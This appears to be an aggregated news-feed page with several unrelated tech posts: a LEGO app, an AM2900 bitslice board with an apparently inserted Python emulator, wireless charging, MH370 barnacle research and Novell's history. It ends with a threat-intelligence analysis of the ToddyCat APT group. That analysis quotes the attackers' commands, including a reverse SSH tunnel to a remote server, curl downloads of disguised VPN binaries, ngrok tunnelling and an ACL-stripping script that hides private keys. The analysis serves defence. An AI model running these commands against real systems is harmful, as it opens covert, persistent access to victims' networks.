We are talking about the BrickIt app, which is available for Android and Apple devices. Check it out in the short demo after the break. Having personally tried the app, we can say it does what it says it does and is in fact quite cool.

As much as it may pain you to have to pick up all those bricks when you’re finished, it really does work better against a neutral background like light-colored carpet. In an attempt to keep the bricks corralled, we tried a wooden tray, and it didn’t seem to be working as well as it probably could have — it didn’t hold that many bricks, and they couldn’t be spread out that far.

The only real downside is that results are limited unless you pay for the full version, and the app keeps reminding you of what you're missing out on. But it's still really, really cool, so check it out.

We don’t have to tell you how versatile LEGO is. But have you seen this keyboard stand, or this PCB vise?

https://www.youtube.com/embed/aW_hv165uNc?feature=oembed

Thanks to [Keith Olson] for the tip!

Slicing and Dicing the Bits: CPU Design the Old Fashioned Way
https://poliverso.org/display/0477a01e-01bbb710-3012261f6e5b90a3

Writing for Hackaday can be somewhat hazardous. Sure, we don’t often have to hide from angry spies or corporate thugs. But we do often write about something and then want to buy it. Expensive? Hard to find? Not needed? Doesn’t really matter. My latest experience with this effect was due to a recent article I wrote about the AM2900 bitslice family of chips. Many vintage computers and video games have them inside, and, as I explained before, they are like a building block you use to build a CPU with the capabilities you need. I had read about these back in the 1970s but never had a chance to work with them.

As I was writing, I wondered if there was anything left for sale with these chips. Turns out you can still get the chips — most of them — pretty readily. But I also found an eBay listing for an AM2900 “learning and evaluation kit.” How many people would want such a thing? Apparently enough that I had to bid a fair bit of coin to take possession of it, but I did. The board looked like it was probably never used. It had the warranty card and all the paperwork. It looked in pristine condition. Powering it up, it seemed to work well.

What Is It?

The board hardly looks at least 40 years old.
The board is a bit larger than a letter-sized sheet of paper. Along the top, there are three banks of four LEDs. The bottom edge has three banks of switches. One bank has three switches, and the other two each have four switches. Two more switches control the board’s operation, and two momentary pushbutton switches.

The heart of the device, though, is the AM2901, a 4-bit “slice.” It isn’t quite a CPU but more just the ALU for a CPU. There’s also an AM2909, which controls the microcode memory. In addition, there’s a small amount of memory spread out over several chips.

A real computer would probably have many slices that work together. It would also have a lot more microprogram memory and then more memory to store the actual program. Microcode is a very simple program that knows how to execute instructions for the CPU.

For example, suppose you wanted an instruction that added the A register to the B register and left the result in the A register. An imaginary microcode program might look like this:
Gate register A onto internal bus X
Gate register B onto internal bus Y
Set ALU to compute X+Y
Gate ALU output to register A

The microcode would normally also fetch the next instruction, too.

The kit lacks any program memory and only has 16 memory slots for microprogram steps. So, in reality, you can probably fake a single instruction and see how it works. But that’s about it. The example I’ll show you is a simple microprogram that converts an 8-bit BCD number into the equivalent binary number. That is, 2 and 8 will convert to 1 and C (since everything is 4-bit). Even this takes all the memory the device has. So don’t expect to emulate a VAX 11/730 (which did, incidentally, use 8 AM2901s).

How it Works


The board doesn’t have a microcontroller, so everything is ordinary logic. It is set up to work with 4-bit numbers and a 32-bit microcode word. Since board space and LEDs were expensive then, everything works with 4 bits at a time. The right-hand bank of switches (the mux select) lets you put a binary number from 000 to 111 (0-7), and that controls which 4-bit part you are working with at any given time.

The LEDs on the left show a data display. Exactly what this means depends on the position of the mux select switches. For example, when the switches are at 001, the data LEDs show the output of the ALU. When the switches are at 010, the ALU’s flags (for example, carry and zero) appear.

The other LEDs show four bits of the pipeline register — the instruction the board is about to execute — and the contents of the microprogram memory (again, the selected four bits).

When the Run/Load switch is set to the load position, you can enter an address on the left-hand switches, and data bits on the middle switches. Then you press Memory Load. That means to completely enter a 32-bit microinstruction, you have to flip the mux switches 8 times and then enter each 4-bit value, one at a time.

If you flip to run, you can use the single step button to execute an instruction, or you can hook up an external clock and use that.

This is all confusing to read about, but the video below will help you see how this old hardware works.

https://www.youtube.com/embed/S1mkKvfPSZ0?feature=oembed

Internals


Internally, you can see that the microprogram memory feeds the pipeline register. The address is from a multiplexer that can select an address from several sources. The pipeline register provides 32 bits that control everything from what the next address is to what the ALU does.
Block diagram of the board
There is a small PROM that serves as a lookup table to control the sequencer. This allows the instruction to use a small number of bits to control the AM2909 sequencer so that you can select the next address, have conditional jumps, or even push or pop the stack internal to the device.

Essentially, the sequencer decides what word to execute, the AM2901 does most of the execution, and the rest is just memory and a little glue logic.

In a real system, you have to account for things like the carry flags and detecting a zero result. However, having only one slice makes things easier. The carry input is part of the microinstruction so you decide when there’s a carry and when there isn’t.

Microinstructions

A scan of the manual's microcode instruction reference
In a real design, the microinstruction size and format are totally up to you. However, since we are using the evaluation board, you must use its format (see the scan above). Each instruction has several major parts: a way to specify what instruction will execute next, a source, and a destination along with an operation. In addition, there are two register fields and a data field (all, of course, four bits). Not all fields are used in every case.

This is a very flexible arrangement because you can, for example, do adding, shifting, and a conditional jump all in one instruction. However, it can take some getting used to. For example, loading a register is usually done by using a logical OR instruction with a constant zero.

The other thing that is strange is the pipelining. Because everything is set up at the start, a conditional jump doesn’t apply to the line it is on but the line before. For example (in pseudo-code):
Goto next, set Q to A+1
If zero goto bump, set B to B+1

The “if” in the second line will trigger on the addition done in the first line.

Assembler

A small excerpt of the "assembler" spreadsheet
If you watch the video, you’ll see that entering a full program is tedious and error-prone. To help, I created an “assembler” using Google Sheets. You can use symbols for addresses, registers, and constants. In most places, you can use a drop-down to pick among options. There’s a place for comments, too.

Once it is filled in, you can hide the “source code” using Control+Alt+Shift+2. That gives you a handy piece to read or print for putting the data into the board. Control+Alt+Shift+1 will restore the display.

Address | Branch | Next     | MUX        | DEST          | SRC | CARRY | ALU    | A | B     | D
0       |        | CONTINUE |            | F->RAM (F)    | D 0 |       | R OR S |   | !ILSD | #Digit0
1       |        | CONTINUE |            | F->RAM (F)    | D 0 |       | R OR S |   | !IMSD | #Digit1
2       |        | CONTINUE |            | F->Q          | D 0 |       | R OR S |   |       | 0
3       |        | CONTINUE | 2 – Double | 2F, 2Q->RAM,Q | 0 B |       | R OR S |   | !RES  | 0

Consider the excerpt from the demo program above. The branch column could contain the next address to execute, but since each line has a continue, the address can be blank. The system will ignore it anyway.

To the right are the A, B, and D columns. The A and B columns are numbers from 0 to 15 signifying one of the ALU’s internal registers. Here, we don’t use A, so it is blank. The D field is for a four-bit constant if you need it.

The ALU column holds the operation to execute and the SRC column is what the inputs to that function are. In the first line, for example, we take D and OR it with zero. At address 3, however, the OR is between a zero and the contents of the B register.

The DEST column tells where the ALU result goes. In most of these lines, it goes to RAM, which is the register named in B. However, at address 2, the result goes to the Q register, which is internal to the AM2901. The destination for address 3 stores the result after doing a double (that is, 8-bit) shift to the left.
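To make the datapath concrete, here is an added example (my own small Python model, not the article's spreadsheet emulator and not the board's logic) of one AM2901-style slice driven by a 16-word microprogram. The source, function and destination names follow the AM2901 datasheet, and the board's "double" shift is assumed to wire Q3 into RAM0 so that RAM[B]:Q behaves as one 8-bit register. Two further simplifications are assumptions of the model: a conditional branch here sees the flags of its own instruction rather than the previous one, and the carry between the two nibbles is propagated by branching on the carry flag and rerunning the high-nibble add with Cn=1, since a single slice has no second slice to chain into. The microprogram performs the same task as the demo program, converting a two-digit BCD number to binary: 2 and 8 in, 1 and C out.

```python
"""Model of one AM2901 slice plus a 16-word microsequencer (added example).

Assumptions: conditional branches see their own instruction's flags (the real
board pipelines them), and the "double" shift wires Q3 into RAM0 so RAM[B]:Q
acts as an 8-bit register. Not the article's emulator or the board's logic.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

MASK = 0xF  # everything on the board is four bits wide

# Source operand pairs (R, S) as the datasheet names them: A/B = RAM ports, Q = Q register,
# D = data field from the microword, Z = zero.
SOURCES = {
    "AQ": lambda m, i: (m.ram[i.a], m.q),   "AB": lambda m, i: (m.ram[i.a], m.ram[i.b]),
    "ZQ": lambda m, i: (0, m.q),            "ZB": lambda m, i: (0, m.ram[i.b]),
    "ZA": lambda m, i: (0, m.ram[i.a]),     "DA": lambda m, i: (i.d, m.ram[i.a]),
    "DQ": lambda m, i: (i.d, m.q),          "DZ": lambda m, i: (i.d, 0),
}


@dataclass
class Micro:
    src: str                 # key into SOURCES
    func: str                # ADD, SUBR, SUBS, OR, AND, NOTRS, EXOR, EXNOR
    dest: str                # QREG, NOP, RAMF, RAMA, RAMQU, RAMU, RAMQD, RAMD
    cn: int = 0              # carry-in is a microword bit, as on the board
    a: int = 0
    b: int = 0
    d: int = 0
    nxt: Optional[Tuple[str, int]] = None  # None=CONTINUE, ("JMP",n), ("IFC",n)=jump if carry, ("HALT",0)


class Slice:
    def __init__(self):
        self.ram, self.q, self.carry, self.zero = [0] * 16, 0, 0, 0

    def alu(self, func, r, s, cn):
        """Return (F, carry-out) for one of the eight AM2901 functions."""
        if func == "ADD":
            total = r + s + cn
        elif func == "SUBR":                       # S - R - 1 + Cn
            total = s + (~r & MASK) + cn
        elif func == "SUBS":                       # R - S - 1 + Cn
            total = r + (~s & MASK) + cn
        else:
            total = {"OR": r | s, "AND": r & s, "NOTRS": ~r & s,
                     "EXOR": r ^ s, "EXNOR": ~(r ^ s)}[func] & MASK
        return total & MASK, (total >> 4) & 1

    def step(self, prog, pc):
        i = prog[pc]
        r, s = SOURCES[i.src](self, i)
        f, self.carry = self.alu(i.func, r, s, i.cn)
        self.zero = int(f == 0)
        if i.dest == "QREG":
            self.q = f
        elif i.dest in ("RAMF", "RAMA"):
            self.ram[i.b] = f
        elif i.dest == "RAMU":
            self.ram[i.b] = (f << 1) & MASK
        elif i.dest == "RAMD":
            self.ram[i.b] = f >> 1
        elif i.dest == "RAMQU":                    # shift RAM[B]:Q left as an 8-bit pair
            self.ram[i.b] = ((f << 1) | (self.q >> 3)) & MASK
            self.q = (self.q << 1) & MASK
        elif i.dest == "RAMQD":                    # shift RAM[B]:Q right as an 8-bit pair
            self.q = (self.q >> 1) | ((f & 1) << 3)
            self.ram[i.b] = f >> 1
        if i.nxt is None:
            return pc + 1
        kind, target = i.nxt
        if kind == "HALT":
            return None
        return target if kind == "JMP" or (kind == "IFC" and self.carry) else pc + 1

    def run(self, prog, limit=64):
        pc = 0
        while pc is not None and limit > 0:
            pc, limit = self.step(prog, pc), limit - 1
        return self


RES, T, L = 0, 1, 2  # register numbers used by the microprogram below


def bcd_to_binary(msd, lsd):
    """Run a 14-word microprogram that leaves 10*msd + lsd in the RES:Q pair."""
    prog = [
        Micro("DZ", "OR", "QREG", d=msd),                         # 0: Q = msd
        Micro("DZ", "OR", "RAMF", b=RES, d=0),                    # 1: RES = 0      (RES:Q = msd)
        Micro("ZB", "OR", "RAMQU", b=RES),                        # 2: RES:Q <<= 1  (2*msd)
        Micro("ZA", "OR", "RAMF", a=RES, b=T),                    # 3: T = RES      (save high nibble)
        Micro("ZQ", "OR", "RAMF", b=L),                           # 4: L = Q        (save low nibble)
        Micro("ZB", "OR", "RAMQU", b=RES),                        # 5: RES:Q <<= 1  (4*msd)
        Micro("ZB", "OR", "RAMQU", b=RES),                        # 6: RES:Q <<= 1  (8*msd)
        Micro("AQ", "ADD", "QREG", a=L, nxt=("IFC", 9)),          # 7: Q += L, branch on carry-out
        Micro("AB", "ADD", "RAMF", a=T, b=RES, nxt=("JMP", 10)),  # 8: RES += T      (no carry)
        Micro("AB", "ADD", "RAMF", a=T, b=RES, cn=1),             # 9: RES += T + 1  (carry) -> 10*msd
        Micro("DQ", "ADD", "QREG", d=lsd, nxt=("IFC", 12)),       # 10: Q += lsd, branch on carry-out
        Micro("ZB", "OR", "NOP", nxt=("JMP", 13)),                # 11: no carry to propagate
        Micro("ZB", "ADD", "RAMF", b=RES, cn=1),                  # 12: RES += 1
        Micro("ZB", "OR", "NOP", nxt=("HALT", 0)),                # 13: done
    ]
    m = Slice().run(prog)
    return (m.ram[RES] << 4) | m.q


if __name__ == "__main__":
    print(hex(bcd_to_binary(2, 8)))  # two nibbles 1 and C, as in the article's demo
```

Words 0 to 2 are the same load-by-OR-with-zero and "2F, 2Q -> RAM, Q" double shift shown in the assembler excerpt; the rest is the multiply-by-ten done as 8x + 2x with the saved 2x added back nibble by nibble. The two `IFC` branches are where a real multi-slice design would simply chain carry-out into the next slice's Cn, which is the limitation the article describes for a single-slice board.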

Obviously, a lot is going on here. If you want to know all about it, you’ll need to read the datasheets and the board manual. I’ve left those for you over on Hackaday.io. You’ll also find links to the assembler and some other material there.

Don’t have a board? No problem. I’ll make an emulator — also spreadsheet-based — available in the next installment along with more about the chip’s internals. If you missed the post that started me down this path, you can go back and read more about the internals and the device’s history. There are plenty of emulators for machines that used the AM2901, although they probably mimic the behavior, not the circuit.

How Wireless Charging Works and Why It’s Terrible
https://poliverso.org/display/0477a01e-06abf1ab-5d726a70a662b188

Wireless charging is pretty convenient, as long as the transmitter and receiver speak the same protocol: just put the device on the charger without worrying about plugging in a cable. Yet as it turns out, the disadvantages of wireless charging may be more severe than you think, at least according to tests by iFixit's [Shahram Mokhtari] and colleagues. The article covers the basics of wireless charging, why wireless chargers waste a lot more power even when not charging, and why they may wear out your device's battery faster than wired charging.

The inefficiency comes mostly from the extra steps needed to generate the alternating current (AC) for the wireless coupling between the coils and to convert it back to DC. It is compounded by misaligned coils, which introduce further losses. Although protocols such as Qi2 and Apple's MagSafe address alignment with magnets, they still lose 59% of the power drawn from the mains to these inefficiencies. Wireless chargers are also forced to stay active, polling for a new device to charge, which keeps a MagSafe charger sucking up 0.2 W in standby.

If the losses from wired charging for a year come down to leaving a 10 W LED lamp on for eight hours in total, wireless charging with MagSafe or Qi2 has you leaving that lamp on for 24 days straight. Since your phone is not a lamp, much of this wasted power is dissipated as heat on both the transmitting and the receiving end. With the receiving coil sitting practically on top of the battery in smartphones, that means raising the battery temperature by about 8°C in the best case (a fully aligned MagSafe/Qi2 charger) compared with wired charging, and sustaining 40+°C with a misaligned Qi charger or, worst of all, the Tesla Charging Platform with its many overlapping coils.

Thus if plugging in a cable to connect a device is that much of a hassle, be sure to at the very least get a wireless charging solution that doesn’t simultaneously bump up your power bill and shorten the lifespan of the device’s battery.

https://www.youtube.com/embed/vhKVuT8-H1g?feature=oembed

The :fsfe: #FSFE #Berlin group will be at the #Umweltfestival 2024, together with @be4foss and @bitsundbaeume_berlin!

Come to our stand to learn about the sustainable use of computers using #FreeSoftware, and many more interesting things!

🗓️ 28 April, from 11 to 19h
📍 Straße des 17. Juni (Brandenburg Gate)

Come by and chat with us!

https://libranet.de/display/0b6b25a8-2066-18d2-e1a0-077531861398


How can we make digitalisation sustainable?

The Berlin group of the FSFE wants to show one answer to this question at the Umweltfestival 2024, together with @Bits&Bäume Berlin and @KDE Eco. Come to our stand to learn more about using computers sustainably with Free Software. We will also have information about Upcycling Android, Public Money, Public Code and the Fediverse at the stand.

We will be there on 28.4. from 11 to 19h on Straße des 17. Juni, between the Siegessäule and the Brandenburg Gate. Come by and talk with us about Free Software!

#freiesoftware #nachhaligkeit #FSFE #Berlin #Digitalisierung

TikTok faces EU Commission’s second probe, potential suspension of reward program
https://poliverso.org/display/0477a01e-e1078433-40ff9746093377b1




The European Commission initiated a second formal proceeding against TikTok under the Digital Services Act on Monday (22 April), focusing on the launch of TikTok Lite in France and Spain, signalling intentions to suspend its "Reward Program" in the EU.


https://www.euractiv.com/section/platforms/news/tiktok-faces-eu-commissions-second-probe-potential-suspension-of-reward-program/




The Hunt for MH370 Goes On With Barnacles As A Lead
https://poliverso.org/display/0477a01e-a6d9b78a-982664658164e611




On March 8, 2014, Malaysia Airlines Flight 370 vanished. The crash site was never found, nor was the plane. It remains one of the most perplexing aviation mysteries in history. In the years since the crash, investigators have looked into everything from ocean currents to obscure radio phenomena to try and locate the plane. All have thus far failed to find the wreckage.

It was in July 2015 that a flaperon from the aircraft washed up on Réunion Island. It was the first piece of wreckage found, and it was hoped it could provide clues to the airliner’s final resting place. While it has yet to reveal a final answer as to the aircraft’s fate, some of the ocean life living on it could provide the clues investigators need to find the plane. The picture is murky right now, but in an investigation where details are scarce, every little clue helps.

Barnacles

A fragment of engine cowling believed to be from MH370, which washed up in December 2015. Note the barnacles covering the debris. Credit: ATSB
Today, there’s a general consensus that MH370 probably went down somewhere in the Indian Ocean. That’s supported both by analysis of satellite pings and the wreckage which washed up at Réunion. Notable on the wreckage was a small population of barnacles of the species Lepas anatifera.

David Griffin, an Australian government scientist, expressed optimism that these barnacles could help pinpoint the crash site. Similarly, American scientist Gregory Herbert thought much the same thing. Akin to the rings of a tree, the shells of the barnacle can reveal a history of the organism. By analyzing the found barnacles against their typical life cycle, they could potentially reveal details about where the wreckage had been.
By studying a barnacle’s shell, it’s possible to reconstruct the conditions of its growth. Credit: research paper
A great deal of research was undertaken to learn more about the species in the hope that better understanding the barnacles could help find the plane. As a species, Lepas anatifera proved to be uniquely perfect for further analysis. These barnacles tend to attach to floating debris, such as that generated by a catastrophic plane crash. Under stable conditions, the barnacles tend to grow at a fairly consistent rate. By looking at the oldest barnacles on the debris, one could try and estimate the length of time it had been in the water. Combining this with models of ocean currents could help figure out where a piece of debris might have come from.

Unfortunately, the innate variability of the sea organisms frustrated easy analysis. By growing their own barnacles in different conditions, researchers soon found that varying sea temperatures had a significant impact on growth size. As did the amount of nutrients available for the barnacles to feed on. Some researchers found that their barnacles maxed out at 20 mm in length after three months, while others grew barnacles over twice as long in a third of the time.
Scientist David Griffin pictured with a replica flaperon used in drift modelling studies by the CSIRO. Source: Peter Mathew via CSIRO
After much analysis and comparison of barnacle studies, initial optimism was dampened by the reality of the evidence. The largest barnacles on the flaperon suggested it had been floating for about four months — far less than the 16 months between the aircraft’s disappearance and the flaperon’s discovery. Indeed, similar results were found for other debris recovered since then, too. “Unfortunately for crash investigators, the new, faster Lepas growth rates suggest that the large (36 mm) Lepas found on the missing Malaysian Airline flight MH370 wreckage at Reunion Island – 16 months after the aircraft was believed to have crashed in 2014 – were much younger than previously realised,” said Iain Suthers, a researcher with the University of New South Wales who worked on barnacle studies.
In testing, it was found the flaperon floated in an orientation where much of it stuck out of the water. And yet, the flaperon was found with barnacles on these very surfaces. It’s a question that doesn’t have an easy answer at this stage. Credit: CSIRO
Other mysteries have presented baffling inconsistencies, too. When French researchers floated the flaperon in a tank to determine how it floated, they found one edge would consistently stick out of the water. This would be all well and good, except this surface was found covered in barnacles, too. This should have been impossible, as the barnacles cannot grow under these conditions.

There are still hopes that barnacle analysis could provide new areas for authorities to search for the plane. In concert with his research team, Herbert published a paper late last year positing a new drift path for the flaperon, based on barnacle studies. The paper lays out a deep analysis of a barnacle shell found on the MH370 flaperon debris. The shell’s makeup was used to determine the sea temperatures at different stages of the barnacle’s growth, based on established research into Lepas anatifera. This was then used to generate a reconstruction of the barnacle’s potential drift path through the ocean before it wound up on Réunion Island. The team hoped to repeat their analysis with larger barnacles from the flaperon debris, if they were to be released for analysis by French authorities.
Herbert’s research team used the sea surface temperature history baked into a barnacle’s shell to generate a new partial drift model for debris that washed up on Réunion Island. Credit: research paper

Grasping at (Very Scientific) Straws


It bears noting that these techniques aren’t the typical way that we hunt for crashed airliners. Normally, radar logs, transponder signals, and other data give us enough to go on to know where to look. In the case of MH370, much of that wasn’t available, meaning authorities and scientists had to get far more creative to hunt it down.

There are still some holes in the barnacle analysis as mentioned above. Plus, without access to all the barnacle evidence, researchers are naturally constrained. Ultimately, it’s an odd application of marine biology to try and solve an implacable mystery. It’s valid to try, but there’s no guarantee these small shelled organisms will turn up the plane that has so far proven impossible to find.

The ongoing investigation into MH370’s disappearance highlights the limitations and potential of using marine biology in solving such mysteries. Despite the advanced technologies and the novel application of biological data, significant gaps remain in our understanding of the debris’ drift patterns.

As researchers continue to study these marine organisms, the MH370 mystery underscores a broader truth: the ocean’s sheer size often defies our efforts to understand it. Trying to find a needle in a haystack would be a cinch by comparison.

Featured image: “Grand Canyon Sunset Through a de Havilland DHC-6 Twin Otter Airplane Cockpit” by Nan Palmero.




Going Canadian: The Rise and Fall of Novell
https://poliverso.org/display/0477a01e-98a2f261-a45781fcf3dc9719




During the 1980s and 1990s, Novell was one of those names you could not avoid if you came anywhere near computers. Starting out selling computers and printers, the company switched to producing networking hardware like the famous NE2000 and the inevitability that was Novell NetWare software, which would cement its fortunes. It wasn’t until the 1990s that Novell began to face headwinds from a new giant: Microsoft. This, along with the rest of Novell’s history, is the topic of a recent article by [Bradford Morgan White], covering the rise, the competition from Microsoft’s Windows NT, and the company’s ultimate demise as it found itself unable to compete in the rapidly changing market around 2000, despite flirting with Linux.

Novell was founded by two experienced executives in 1980, with the name reportedly being a misspelling of the French word for ‘new’ (nouveau or nouvelle). Even with NetWare having cornered the networking market, there was still a dearth of networking equipment such as Ethernet expansion cards. This led Novell to introduce the 8-bit ISA card NE1000 in 1987, later followed by the 16-bit NE2000. Priced lower than competing products, they became a market favorite. Then Windows NT rolled in during the 1990s and began to destroy NetWare’s market share, leaving Novell to flounder until it was snapped up by Attachmate in 2011, which was snapped up by Micro Focus International in 2014, which in turn got gobbled up by Canada-based OpenText in 2023. There Novell’s technologies were distributed across its divisions, finally ending Novell’s story.




ToddyCat is making holes in your infrastructure
https://poliverso.org/display/0477a01e-0e4939e4-61f38889cd2ee0b8




We continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for collecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.

ToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.

During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible and provide several alternative means to continuously access and monitor the systems they attack. We decided to investigate how ToddyCat implemented this. Note that all tools described in this article are applied at the stage where the attackers have already compromised high-privileged user credentials that allow them to connect to remote hosts. In most cases, the adversary connected, transferred and ran all required tools with the help of PsExec or Impacket.

Tools for traffic tunneling


Having several tunnels into the infected infrastructure, implemented with different tools, allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.

Reverse SSH Tunnel


One way to gain access to remote network services is to create a reverse SSH tunnel.

Attackers use several files to launch a reverse SSH tunnel:

  1. The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it
  2. An OPENSSH private key file
  3. The “a.bat” script to hide the private key file

The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares).

The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.
C:\program files\OpenSSH\ssh.exe
C:\programdata\sshd\ssh.exe
C:\programdata\ssh\ssh.exe
The private key files required for establishing a connection to the remote server were copied to the following paths.
C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat
OpenSSH private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.

After the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat script. In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.
c:\users\public\a.bat
This file contains the following commands.
@echo off
::# Set Key File Variable:

Set Key="C:\Windows\AppReadiness"

takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
icacls "%Key%" >> "%temp%\a.txt"

::# Remove Variable:
set "Key="
In Windows, C:\Windows\AppReadiness is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.

The icacls command output for the AppReadiness folder with default values

The image above shows the default permissions for this folder:

  • Administrators and system: full permissions
  • Authorized users: read-only permissions

This means that regular users can view the contents of the folder.

The a.bat script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for C:\Windows\AppReadiness after the script has run:

The icacls command output for the AppReadiness folder after a.bat script has executed

Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a “no permission” error.

Access denied error and Security tab for the AppReadiness folder

To start the tunnel, attackers create a scheduled task that runs the following command.
C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
StrictHostKeyChecking=accept-new -R 31481:localhost:53
systemtest01@103[.]27.202.85 -p 22222 -fN
This command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as the user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.

In the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the server to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.

Each user is assigned to a different port on the infected host. For example, the user systemtest05 redirects traffic from the malicious server to port 445, normally used by SMB services.

The remote server IP information is shown in the table below.

IP | Country + ASN | Net name | Net description | Address | Email
103.27.202[.]85 | Thailand, AS58955 | BANGMOD-VPS-NETWORK | Bangmod VPS Network | Bangmod-IDC Supermicro Thailand Powered by CSloxinfo | support@bangmod.co.th

The whole process of creating an SSH tunnel can be described with the diagram given below.

Diagram of SSH tunnel creation

SoftEther VPN


The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.

SoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

To launch the VPN server, the attackers used the following files:

  • vpnserver_x64.exe: a digitally signed VPN server executable
  • hamcore.se2: a container file that includes components required to run vpnserver_x64.exe
  • vpn_server.config: server configuration

In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.

In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system. The following names of, and paths to, this file are known:
c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo\kln.exe
c:\programdata\iobit\iobitrtt\tmp\mstime.exe
c:\perflogs\ecache\boot.exe
C:\users\public\music\wia.exe
c:\windows\debug\wia\wia.exe
c:\users\public\music\taskllst.exe
c:\programdata\lenovo\lenovo\main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe
You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.

The file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.

To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote resources using the curl utility (see below).
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1
We observed the following remote resources being used as download sources.

URL | Original file name
hxxp://www.netportal.or[.]kr/common/css/main.js | vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js | Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2 | Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe | vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 | Hamcore.se2

In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then edited.
"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1
"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp
In this case, after installing the server in the system, the attackers changed the server settings in vpn_server.config.

Data for connecting the remote client to the server and its authentication details are added to the configuration file:

Account name | Hostname
ha.bbmouseme[.]com | 118[.]193.40.42

Ngrok agent and Krong


Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user’s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.

The agent can be started, for instance, with the following command.
"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
authtoken 2GskqGD<token>txB7WyV"
The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file side-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.
"cmd" /c "cd C:\windows\temp\ & SystemInformation.exe 0.0.0.0 54112"
Krong is a proxy that encrypts the data transmitted through it using the XOR function.

Code snippet for deciphering received data

This allows Krong to hide the contents of the traffic to evade detection.

FRP client


After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP client. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.

The attackers used two files to run the client:

  • Frpc.exe: an FRP client executable file
  • Frpc.toml: a client configuration file

The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as was the case with the OpenSSH private key files.

After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.
c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini
